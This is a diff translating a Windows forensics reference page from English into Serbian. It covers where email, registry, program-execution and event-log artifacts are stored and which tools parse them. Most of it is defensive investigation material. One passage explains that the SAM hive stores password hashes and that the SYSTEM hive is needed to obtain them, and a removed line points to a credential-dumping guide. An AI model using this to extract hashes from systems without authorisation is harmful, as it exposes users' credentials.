+**Za više informacija pogledajte:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
-## Emails
+## Emailovi
-Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like:
+Emailovi sadrže **2 zanimljiva dela: zaglavlja i sadržaj** emaila. U **zaglavljima** možete pronaći informacije kao što su:
-* **Who** sent the emails (email address, IP, mail servers that have redirected the email)
-* **When** was the email sent
+* **Ko** je poslao email (adresa e-pošte, IP adresa, poštanski serveri koji su preusmerili email)
+* **Kada** je email poslat
-Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
+Takođe, u zaglavljima `References` i `In-Reply-To` možete pronaći ID poruka:
![](<../../../.gitbook/assets/image (484).png>)
-### Windows Mail App
+### Windows Mail aplikacija
-This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension.
+Ova aplikacija čuva emailove u HTML ili tekstualnom formatu. Emailovi se mogu pronaći unutar podfoldera unutar `\Users\\AppData\Local\Comms\Unistore\data\3\`. Emailovi se čuvaju sa ekstenzijom `.dat`.
-The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol`
+**Metapodaci** emailova i **kontakti** mogu se pronaći unutar **EDB baze podataka**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol`
-**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails.
+**Promenite ekstenziju** datoteke iz `.vol` u `.edb` i možete koristiti alatku [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) da je otvorite. U tabeli `Message` možete videti emailove.
### Microsoft Outlook
-When Exchange servers or Outlook clients are used there are going to be some MAPI headers:
+Kada se koriste Exchange serveri ili Outlook klijenti, postojaće neka MAPI zaglavlja:
-* `Mapi-Client-Submit-Time`: Time of the system when the email was sent
-* `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread
-* `Mapi-Entry-ID`: Message identifier.
-* `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?)
+* `Mapi-Client-Submit-Time`: Vreme sistema kada je email poslat
+* `Mapi-Conversation-Index`: Broj dečijih poruka u niti i vremenska oznaka svake poruke u niti
+* `Mapi-Entry-ID`: Identifikator poruke.
+* `Mappi-Message-Flags` i `Pr_last_Verb-Executed`: Informacije o MAPI klijentu (poruka pročitana? nepročitana? odgovorena? preusmerena? van kancelarije?)
-In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in:
+U Microsoft Outlook klijentu, sve poslate/primljene poruke, podaci o kontaktima i podaci o kalendaru se čuvaju u PST datoteci na sledećoj putanji:
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP)
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
-The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used.
+Putanja registra `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` ukazuje na korišćenu datoteku.
-You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
+PST datoteku možete otvoriti koristeći alatku [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
![](<../../../.gitbook/assets/image (485).png>)
+### Microsoft Outlook OST fajlovi
-### Microsoft Outlook OST Files
+**OST fajl** se generiše od strane Microsoft Outlook-a kada je konfigurisan sa **IMAP** ili **Exchange** serverom, čuvajući slične informacije kao PST fajl. Ovaj fajl je sinhronizovan sa serverom i čuva podatke za **poslednjih 12 meseci** do **maksimalne veličine od 50GB**, i nalazi se u istom direktorijumu kao i PST fajl. Za pregled OST fajla, može se koristiti [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html).
-An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
+### Dobijanje priloga
-### Retrieving Attachments
+Izgubljeni prilozi mogu biti povraćeni sa:
-Lost attachments might be recoverable from:
+- Za **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
+- Za **IE11 i novije**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
-- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
-- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
+### Thunderbird MBOX fajlovi
-### Thunderbird MBOX Files
+**Thunderbird** koristi **MBOX fajlove** za čuvanje podataka, smeštene na lokaciji `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
-**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
+### Sličice slika
-### Image Thumbnails
+- **Windows XP i 8-8.1**: Pregledanje foldera sa sličicama generiše `thumbs.db` fajl koji čuva prikaze slika, čak i nakon brisanja.
+- **Windows 7/10**: `thumbs.db` se kreira prilikom pristupa preko mreže putem UNC putanje.
+- **Windows Vista i novije**: Sličice slika su centralizovane u `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` sa fajlovima nazvanim **thumbcache\_xxx.db**. Alati [**Thumbsviewer**](https://thumbsviewer.github.io) i [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) se koriste za pregledanje ovih fajlova.
-- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion.
-- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path.
-- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files.
+### Informacije iz Windows registra
-### Windows Registry Information
+Windows registar, koji čuva obimne podatke o aktivnostima sistema i korisnika, nalazi se u fajlovima:
-The Windows Registry, storing extensive system and user activity data, is contained within files in:
+- `%windir%\System32\Config` za različite `HKEY_LOCAL_MACHINE` podključeve.
+- `%UserProfile%{User}\NTUSER.DAT` za `HKEY_CURRENT_USER`.
+- Windows Vista i novije verzije čuvaju rezervne kopije `HKEY_LOCAL_MACHINE` registarskih fajlova u `%Windir%\System32\Config\RegBack\`.
+- Dodatno, informacije o izvršavanju programa se čuvaju u `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` od Windows Vista i Windows 2008 Server verzija nadalje.
-- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys.
-- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`.
-- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`.
-- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards.
+### Alati
-### Tools
+Neki alati su korisni za analizu registarskih fajlova:
-Some tools are useful to analyze the registry files:
+* **Registry Editor**: Instaliran je u Windows-u. To je grafički interfejs za navigaciju kroz Windows registar trenutne sesije.
+* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): Omogućava učitavanje registarskog fajla i navigaciju kroz njega pomoću grafičkog interfejsa. Takođe sadrži obeleživače koji ističu ključeve sa interesantnim informacijama.
+* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Ima grafički interfejs koji omogućava navigaciju kroz učitani registar i takođe sadrži dodatke koji ističu interesantne informacije unutar učitanog registra.
+* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Još jedna aplikacija sa grafičkim interfejsom koja je sposobna da izvuče važne informacije iz učitanog registra.
-* **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session.
-* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information.
-* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry.
-* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded.
+### Povraćaj obrisanih elemenata
-### Recovering Deleted Element
+Kada se ključ obriše, označava se kao takav, ali se neće ukloniti sve dok prostor koji zauzima ne bude potreban. Stoga, korišćenjem alata kao što je **Registry Explorer** moguće je povratiti ove obrisane ključeve.
-When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys.
+### Vreme poslednje izmene
-### Last Write Time
-
-Each Key-Value contains a **timestamp** indicating the last time it was modified.
+Svaki ključ-vrednost sadrži **vremensku oznaku** koja pokazuje kada je poslednji put izmenjen.
### SAM
-The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system.
+Fajl/hive **SAM** sadrži heševe **korisnika, grupa i lozinki korisnika** sistema.
-In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**.
+U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju prijavu, poslednji neuspeli pokušaj prijave, brojač prijava, politiku lozinke i kada je nalog kreiran. Da biste dobili **heševe**, takođe **trebate** fajl/hive **SYSTEM**.
-### Interesting entries in the Windows Registry
+### Interesantni unosi u Windows registru
{% content-ref url="interesting-windows-registry-keys.md" %}
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
{% endcontent-ref %}
-## Programs Executed
+## Izvršeni programi
-### Basic Windows Processes
+### Osnovni Windows procesi
-In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours.
+U [ovom postu](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) možete saznati o uobičajenim Windows procesima kako biste otkrili sumnjive ponašanja.
-### Windows Recent APPs
+### Nedavni Windows programi
-Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched.
+Unutar registra `NTUSER.DAT` na putanji `Software\Microsoft\Current Version\Search\RecentApps` možete pronaći podključeve sa informacijama o **izvršenim aplikacijama**, **poslednjem vremenu** izvršavanja i **broju puta** koliko su pokrenute.
### BAM (Background Activity Moderator)
-You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry).
+Možete otvoriti fajl `SYSTEM` sa registarskim editorom i unutar putanje `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` možete pronaći informacije o **aplikacijama izvršenim od strane svakog korisnika** (obratite pažnju na `{SID}` u putanji) i **vremenu** kada su izvršene (vreme se nalazi unutar vrednosti podataka registra).
### Windows Prefetch
-Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker.
+Prefetching je tehnika koja omogućava računaru da tiho **preuzme neophodne resurse potrebne za prikaz sadržaja** kojem korisnik **može pristupiti u bliskoj budućnosti**, kako bi se resursi mogli brže pristupiti.
-Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10.
+Windows prefetch se sastoji od kreiranja **keševa izvršenih programa** kako bi se mogli brže učitati. Ovi keševi se kreiraju kao `.pf` fajlovi unutar putanje: `C:\Windows\Prefetch`. Postoji ograničenje od 128 fajlova u XP/VISTA/WIN7 i 1024 fajla u Win8/Win10.
-The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point.
+Naziv fajla se kreira kao `{ime_programa}-{hash}.pf` (hash se bazira na putanji i argumentima izvršnog fajla). U W10 su ovi fajlovi kompresovani. Imajte na umu da samo prisustvo fajla ukazuje da je **program izvršen** u nekom trenutku.
-The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program.
-
-To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
+Fajl `C:\Windows\Prefetch\Layout.ini` sadrži **nazive foldera fajlova koji su prefetch-ovani**. Ovaj fajl sadrži **informacije o broju izvršavanja**, **datumima** izvršavanja i **fajlovima** **otvorenim** od strane programa.
+Za pregledanje ovih fajlova možete koristiti alat [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
-
![](<../../../.gitbook/assets/image (487).png>)
### Superprefetch
-**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\
-This service will generate database files in `C:\Windows\Prefetch\Ag*.db`.
+**Superprefetch** ima isti cilj kao i prefetch, **brže učitavanje programa** predviđanjem šta će se sledeće učitati. Međutim, ne zamenjuje prefetch servis.\
+Ovaj servis generiše bazu podataka u `C:\Windows\Prefetch\Ag*.db`.
-In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**.
+U ovim bazama podataka možete pronaći **ime** **programa**, **broj** **izvršavanja**, **otvorene** **datoteke**, **pristupane** **particije**, **kompletan** **putanja**, **vremenski okviri** i **vremenske oznake**.
-You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
+Ove informacije možete pristupiti pomoću alata [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
### SRUM
-**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`.
+**System Resource Usage Monitor** (SRUM) **prati** **resurse** **koje proces koristi**. Pojavio se u W8 i podatke čuva u ESE bazi podataka smeštenoj u `C:\Windows\System32\sru\SRUDB.dat`.
-It gives the following information:
+Daje sledeće informacije:
-* AppID and Path
-* User that executed the process
-* Sent Bytes
-* Received Bytes
-* Network Interface
-* Connection duration
-* Process duration
+* AppID i putanja
+* Korisnik koji je izvršio proces
+* Poslati bajtovi
+* Primljeni bajtovi
+* Mrežni interfejs
+* Trajanje veze
+* Trajanje procesa
-This information is updated every 60 mins.
-
-You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
+Ove informacije se ažuriraju svakih 60 minuta.
+Možete dobiti podatke iz ovog fajla koristeći alat [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
```bash
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
```
-
### AppCompatCache (ShimCache)
-The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include:
+**AppCompatCache**, poznat i kao **ShimCache**, čini deo **Baze podataka o kompatibilnosti aplikacija** koju je razvio **Microsoft** kako bi rešio probleme sa kompatibilnošću aplikacija. Ovaj sistemski komponent beleži različite metapodatke datoteka, koji uključuju:
-- Full path of the file
-- Size of the file
-- Last Modified time under **$Standard\_Information** (SI)
-- Last Updated time of the ShimCache
-- Process Execution Flag
+- Puni put do datoteke
+- Veličinu datoteke
+- Vreme poslednje izmene pod **$Standard\_Information** (SI)
+- Vreme poslednjeg ažuriranja ShimCache-a
+- Zastavicu izvršenja procesa
-Such data is stored within the registry at specific locations based on the version of the operating system:
+Takvi podaci se čuvaju u registru na određenim lokacijama, u zavisnosti od verzije operativnog sistema:
-- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries.
-- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively.
+- Za XP, podaci se čuvaju pod `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` sa kapacitetom od 96 unosa.
+- Za Server 2003, kao i za verzije Windowsa 2008, 2012, 2016, 7, 8 i 10, putanja za čuvanje je `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, sa kapacitetom od 512, odnosno 1024 unosa.
-To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
+Za analizu čuvanih informacija preporučuje se korišćenje alata [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser).
![](<../../../.gitbook/assets/image (488).png>)
### Amcache
-The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`.
+Datoteka **Amcache.hve** je suštinski registarski hive koji beleži detalje o aplikacijama koje su izvršene na sistemu. Obično se nalazi na putanji `C:\Windows\AppCompat\Programas\Amcache.hve`.
-This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system.
-
-To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format:
+Ova datoteka je značajna jer čuva zapise o nedavno izvršenim procesima, uključujući putanje do izvršnih datoteka i njihove SHA1 heš vrednosti. Ove informacije su neprocenjive za praćenje aktivnosti aplikacija na sistemu.
+Za izdvajanje i analizu podataka iz **Amcache.hve** datoteke može se koristiti alat [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser). Sledeća komanda je primer kako koristiti AmcacheParser za analizu sadržaja datoteke **Amcache.hve** i izlaz rezultata u CSV formatu:
```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
+Među generisanim CSV datotekama, posebno je značajna datoteka `Amcache_Unassociated file entries` zbog bogatih informacija koje pruža o nepovezanim unosima datoteka.
-Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries.
-
-The most interesting CVS file generated is the `Amcache_Unassociated file entries`.
+Najinteresantnija generisana CSV datoteka je `Amcache_Unassociated file entries`.
### RecentFileCache
-This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
+Ovaj artefakt se može pronaći samo u W7 u `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i sadrži informacije o nedavnom izvršavanju određenih binarnih datoteka.
-You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file.
+Možete koristiti alat [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) za parsiranje datoteke.
-### Scheduled tasks
+### Zakazani zadaci
-You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML.
+Možete ih izvući iz `C:\Windows\Tasks` ili `C:\Windows\System32\Tasks` i čitati ih kao XML.
-### Services
+### Servisi
-You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when.
+Možete ih pronaći u registru pod `SYSTEM\ControlSet001\Services`. Možete videti šta će biti izvršeno i kada.
### **Windows Store**
-The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\
-This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**.
+Instalirane aplikacije mogu se pronaći u `\ProgramData\Microsoft\Windows\AppRepository\`\
+Ovaj repozitorijum ima **log** sa **svakom instaliranom aplikacijom** u sistemu unutar baze podataka **`StateRepository-Machine.srd`**.
-Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential.
+Unutar tabele Application ove baze podataka, mogu se pronaći kolone: "Application ID", "PackageNumber" i "Display Name". Ove kolone sadrže informacije o preinstaliranim i instaliranim aplikacijama, a može se utvrditi da li su neke aplikacije deinstalirane jer bi ID-jevi instaliranih aplikacija trebali biti uzastopni.
-It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
-And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
+Takođe je moguće **pronaći instalirane aplikacije** unutar putanje registra: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
+I **deinstalirane aplikacije** u: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
-## Windows Events
+## Windows događaji
-Information that appears inside Windows events are:
+Informacije koje se pojavljuju unutar Windows događaja su:
-* What happened
-* Timestamp (UTC + 0)
-* Users involved
-* Hosts involved (hostname, IP)
-* Assets accessed (files, folder, printer, services)
+* Šta se desilo
+* Vremenska oznaka (UTC + 0)
+* Uključeni korisnici
+* Uključeni hostovi (ime računara, IP adresa)
+* Pristupani resursi (datoteke, folderi, štampači, servisi)
-The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension.
+Logovi se nalaze u `C:\Windows\System32\config` pre Windows Viste i u `C:\Windows\System32\winevt\Logs` posle Windows Viste. Pre Windows Viste, logovi događaja su bili u binarnom formatu, a posle toga su u **XML formatu** i koriste **.evtx** ekstenziju.
-The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
+Lokacija datoteka događaja može se pronaći u registru sistema u **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
-They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
+Mogu se vizualizovati putem Windows Event Viewer-a (**`eventvwr.msc`**) ili drugim alatima poput [**Event Log Explorer**](https://eventlogxp.com) **ili** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
-## Understanding Windows Security Event Logging
+## Razumevanje beleženja događaja o bezbednosti u Windows-u
-Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access.
+Pristupni događaji se beleže u konfiguracionoj datoteci bezbednosti koja se nalazi na lokaciji `C:\Windows\System32\winevt\Security.evtx`. Veličina ove datoteke je podesiva, a kada se dostigne kapacitet, stariji događaji se prepisuju. Beleženi događaji uključuju prijavljivanje i odjavljivanje korisnika, korisničke radnje i promene u postavkama bezbednosti, kao i pristupanje datotekama, folderima i deljenim resursima.
-### Key Event IDs for User Authentication:
+### Ključni ID-jevi događaja za autentifikaciju korisnika:
-- **EventID 4624**: Indicates a user successfully authenticated.
-- **EventID 4625**: Signals an authentication failure.
-- **EventIDs 4634/4647**: Represent user logoff events.
-- **EventID 4672**: Denotes login with administrative privileges.
+- **EventID 4624**: Ukazuje na uspešnu autentifikaciju korisnika.
+- **EventID 4625**: Označava neuspešnu autentifikaciju.
+- **EventID 4634/4647**: Predstavljaju događaje odjavljivanja korisnika.
+- **EventID 4672**: Označava prijavljivanje sa administratorskim privilegijama.
-#### Sub-types within EventID 4634/4647:
+#### Podtipovi unutar EventID 4634/4647:
-- **Interactive (2)**: Direct user login.
-- **Network (3)**: Access to shared folders.
-- **Batch (4)**: Execution of batch processes.
-- **Service (5)**: Service launches.
-- **Proxy (6)**: Proxy authentication.
-- **Unlock (7)**: Screen unlocked with a password.
-- **Network Cleartext (8)**: Clear text password transmission, often from IIS.
-- **New Credentials (9)**: Usage of different credentials for access.
-- **Remote Interactive (10)**: Remote desktop or terminal services login.
-- **Cache Interactive (11)**: Login with cached credentials without domain controller contact.
-- **Cache Remote Interactive (12)**: Remote login with cached credentials.
-- **Cached Unlock (13)**: Unlocking with cached credentials.
+- **Interactive (2)**: Direktno prijavljivanje korisnika.
+- **Network (3)**: Pristup deljenim fasciklama.
+- **Batch (4)**: Izvršavanje batch procesa.
+- **Service (5)**: Pokretanje servisa.
+- **Proxy (6)**: Proksi autentifikacija.
+- **Unlock (7)**: Otključavanje ekrana lozinkom.
+- **Network Cleartext (8)**: Prenos lozinke u čistom tekstu, često od strane IIS-a.
+- **New Credentials (9)**: Korišćenje drugih akreditiva za pristup.
+- **Remote Interactive (10)**: Prijavljivanje putem udaljenog radnog okruženja ili terminalnih usluga.
+- **Cache Interactive (11)**: Prijavljivanje sa keširanim akreditivima bez kontakta sa kontrolerom domena.
+- **Cache Remote Interactive (12)**: Udaljeno prijavljivanje sa keširanim akreditivima.
+- **Cached Unlock (13)**: Otključavanje sa keširanim akreditivima.
-#### Status and Sub Status Codes for EventID 4625:
+#### Statusni i podstatusni kodovi za EventID 4625:
-- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack.
-- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt.
-- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins.
-- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts.
-- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access.
-- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location.
-- **0xC0000193**: Account expiration - Access attempts with expired user accounts.
-- **0xC0000071**: Expired password - Login attempts with outdated passwords.
-- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket.
-- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security.
-- **0xC0000225**: Indicates a system bug rather than a security issue.
-- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon.
+- **0xC0000064**: Korisničko ime ne postoji - Može ukazivati na napad enumeracije korisničkih imena.
+- **0xC000006A**: Ispravno korisničko ime, ali pogrešna lozinka - Mogući pokušaj nagađanja ili napad metodom isprobavanja svih mogućih kombinacija lozinki.
+- **0xC0000234**: Korisnički nalog zaključan - Može pratiti napad metodom isprobavanja svih mogućih kombinacija lozinki koji rezultira višestrukim neuspelim prijavljivanjima.
+- **0xC0000072**: Onemogućen nalog - Neovlašćeni pokušaji pristupa onemogućenim nalozima.
+- **0xC000006F**: Prijavljivanje van dozvoljenog vremena - Ukazuje na pokušaje pristupa van postavljenih vremenskih okvira za prijavljivanje, što može biti znak neovlašćenog pristupa.
+- **0xC0000070**: Kršenje ograničenja radne stanice - Može biti pokušaj prijavljivanja sa neovlašćene lokacije.
+- **0xC0000193**: Isteče vreme naloga - Pokušaji pristupa sa isteklim korisničkim nalozima.
+- **0xC0000071**: Istečena lozinka - Pokušaji prijavljivanja sa zastarelim lozinkama.
+- **0xC0000133**: Problemi sa sinhronizacijom vremena - Velike razlike u vremenu između klijenta i servera mogu ukazivati na sofisticiranije napade poput "pass-the-ticket".
+- **0xC0000224**: Obavezna promena lozinke - Česte obavezne promene mogu ukazivati na pokušaj narušavanja sigurnosti naloga.
+- **0xC0000225**: Ukazuje na grešku u sistemu, a ne na sigurnosni problem.
+- **0xC000015b**: Odbijen tip prijavljivanja - Pokušaj pristupa sa neovlašćenim tipom prijavljivanja, kao što je pokušaj korisnika da izvrši prijavljivanje servisa.
#### EventID 4616:
-- **Time Change**: Modification of the system time, could obscure the timeline of events.
+- **Promena vremena**: Izmena sistemskog vremena, može otežati forenzičku analizu događaja.
-#### EventID 6005 and 6006:
-- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down.
+#### EventID 6005 i 6006:
+- **Pokretanje i gašenje sistema**: EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje sistema.
#### EventID 1102:
-- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities.
+- **Brisanje logova**: Brisanje sigurnosnih logova, što često ukazuje na pokušaj prikrivanja nezakonitih aktivnosti.
-#### EventIDs for USB Device Tracking:
-- **20001 / 20003 / 10000**: USB device first connection.
-- **10100**: USB driver update.
-- **EventID 112**: Time of USB device insertion.
+#### EventID-ovi za praćenje USB uređaja:
+- **20001 / 20003 / 10000**: Prvo povezivanje USB uređaja.
+- **10100**: Ažuriranje drajvera USB uređaja.
+- **EventID 112**: Vreme umetanja USB uređaja.
-For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
